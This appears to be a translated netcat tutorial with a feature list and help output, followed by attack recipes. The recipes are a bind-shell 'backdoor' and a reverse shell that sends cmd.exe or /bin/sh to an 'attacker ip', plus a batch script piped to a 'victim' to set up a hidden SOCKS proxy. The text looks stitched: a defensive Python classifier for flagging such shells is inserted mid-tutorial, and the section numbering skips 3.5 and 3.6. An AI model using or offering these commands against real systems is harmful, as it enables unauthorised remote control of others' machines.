######################################################################
1. Netcat 1.10 for NT - nc11nt.zip
######################################################################
Basic Features
* Outbound or inbound connections, TCP or UDP, to or from any ports
* Full DNS forward/reverse checking, with appropriate warnings
* Ability to use any local source port
* Ability to use any locally-configured network source address
* Built-in port-scanning capabilities, with randomizer
* Can read command line arguments from standard input
* Slow-send mode, one line every N seconds
* Hex dump of transmitted and received data
* Ability to let another program service established connections
* Telnet-options responder
New for NT
* Ability to run in the background without a console window
* Ability to restart as a single-threaded server to handle a new connection
________________________________________________________________________
Some of the features of netcat are:
Outbound or inbound connections, TCP or UDP, to or from any ports
Full DNS forward/reverse checking, with appropriate warnings
Ability to use any local source port
Ability to use any locally-configured network source address
Built-in port-scanning capabilities, with randomizer
Built-in loose source-routing capability
Can read command line arguments from standard input
Slow-send mode, one line every N seconds
Optional ability to let another program service inbound connections
Some of the potential uses of netcat:
Script backends
Scanning ports and inventorying services
Backup handlers
File transfers
Server testing and simulation
Firewall testing
Proxy gatewaying
Network performance testing
Address spoofing tests
Protecting X servers
1001 other uses you'll likely come up with
######################################################################
2. Netcat 1.10 for NT help output
######################################################################
C:\WINDOWS\Desktop>nc -h
[v1.10 NT]
connect to somewhere:   nc [-options] hostname port[s] [ports] ...
listen for inbound:     nc -l -p port [options] [hostname] [port]
options:
        -d              detach from console, background mode (background mode)
        -e prog         inbound program to exec [dangerous!!]
        -g gateway      source-routing hop point[s], up to 8
        -G num          source-routing pointer: 4, 8, 12, ...
        -h              this cruft (this help text)
        -i secs         delay interval for lines sent, ports scanned (delay interval)
        -l              listen mode, for inbound connects (listen mode, wait for connections)
        -L              listen harder, re-listen on socket close (keep listening after the connection closes)
        -n              numeric-only IP addresses, no DNS (numeric IP mode, no DNS resolution)
        -o file         hex dump of traffic (hex-dump output file, three sections)
        -p port         local port number (local port)
        -r              randomize local and remote ports (randomize local and remote ports)
        -s addr         local source address (local source address)
        -t              answer TELNET negotiation
        -u              UDP mode
        -v              verbose [use twice to be more verbose] (-vv for more detail)
        -w secs         timeout for connects and final net reads
        -z              zero-I/O mode [used for scanning] (scan mode, use with -vv)
port numbers can be individual or ranges: m-n [inclusive]
3.1. Port probing:
nc -vv ip port
RIVER [192.168.0.198] 19190 (?) open    // shows whether the port is open
3.2. Scanner
nc -vv -w 5 ip port-port port
nc -vv -z ip port-port port
Scanning this way leaves a lot of traces, and the system administrator will be extra careful.
3.3. Backdoor
victim machine:                 // the victim's machine
nc -l -p port -e cmd.exe        // win2000
nc -l -p port -e /bin/sh        // unix, linux
attacker machine:               // the attacker's machine
nc ip -p port                   // connect to victim_IP and get a shell.
3.4. Reverse connection
attacker machine:
// usually after an sql2.exe or webdavx3.exe remote overflow attack,
// or via wollf's reverse connection.
nc -vv -l -p port
victim machine:
nc -e cmd.exe attacker ip -p port
nc -e /bin/sh attacker ip -p port
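As an added example (not code from the original page or from netcat itself), the following Python classifies nc command lines taken from process-creation logs into the patterns shown in 3.2 through 3.4 (port scan, bind shell, reverse shell), so a defender can flag the -e and -d forms. The option table is taken from the -h output in section 2; the sample command lines, hosts and ports are constructed.

```python
import shlex

# Netcat 1.10 options that take an argument, taken from the -h output above.
ARG_OPTS = set("egGiopsw")

def parse_nc_args(cmdline):
    """Split an nc command line into (flags, option values, positional args);
    handles '-l -p 4444', the bundled '-lvp 4444' and the repeated '-vv' forms."""
    tokens = shlex.split(cmdline)
    flags, values, positional = set(), {}, []
    i = 1                                  # tokens[0] is nc / nc.exe itself
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("-") and len(tok) > 1:
            for j, ch in enumerate(tok[1:], start=1):
                if ch in ARG_OPTS:         # value is the rest of the token or the next one
                    rest = tok[j + 1:]
                    if not rest:
                        i += 1
                        rest = tokens[i] if i < len(tokens) else None
                    values[ch] = rest
                    break
                flags.add(ch)
        else:
            positional.append(tok)
        i += 1
    return flags, values, positional

def classify_nc(cmdline):
    """Label one nc invocation with the usage pattern from sections 3.2-3.4."""
    flags, values, positional = parse_nc_args(cmdline)
    listening = "l" in flags or "L" in flags
    if "e" in values:                      # -e hands the connection to a program
        category = "bind_shell" if listening else "reverse_shell"
    elif "z" in flags:
        category = "port_scan"
    else:
        category = "listener" if listening else "client"
    return {"category": category, "exec": values.get("e"),
            "detached": "d" in flags, "target": positional[0] if positional else None}

def shell_handlers(cmdlines):
    """Return the command lines that hand a connection to a program (-e)."""
    return [c for c in cmdlines if classify_nc(c)["category"].endswith("_shell")]

# Constructed sample process command lines (hypothetical hosts and ports).
SAMPLE_CMDLINES = ["nc -vv -w 5 10.0.0.7 80", "nc -vv -z 10.0.0.7 20-25",
                   "nc -l -p 4444 -e cmd.exe", "nc -d -e cmd.exe 10.0.0.5 4444",
                   "nc -lvp 8080"]
```

Run shell_handlers(SAMPLE_CMDLINES) to get only the two -e invocations; the "detached" field marks the -d form, which runs without a console window.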
3.7. telnet, automated batch.
★★★★★ This is the thing I most want to recommend.
nc victim_ip port < path\file.cmd        /* victim machine */  shows the execution process.
nc -vv victim_ip port < path\file.cmd    /* victim machine */  shows the execution process.
nc -d victim_ip port < path\file.cmd     quiet mode.
_______________file.cmd________________________
password
cd %windir%
echo []=[%windir%]
c:
cd \
md test
cd /d %windir%\system32\
net stop sksockserver
snake.exe -config port 11111
net start sksockserver
exit
_______________file.cmd__END___________________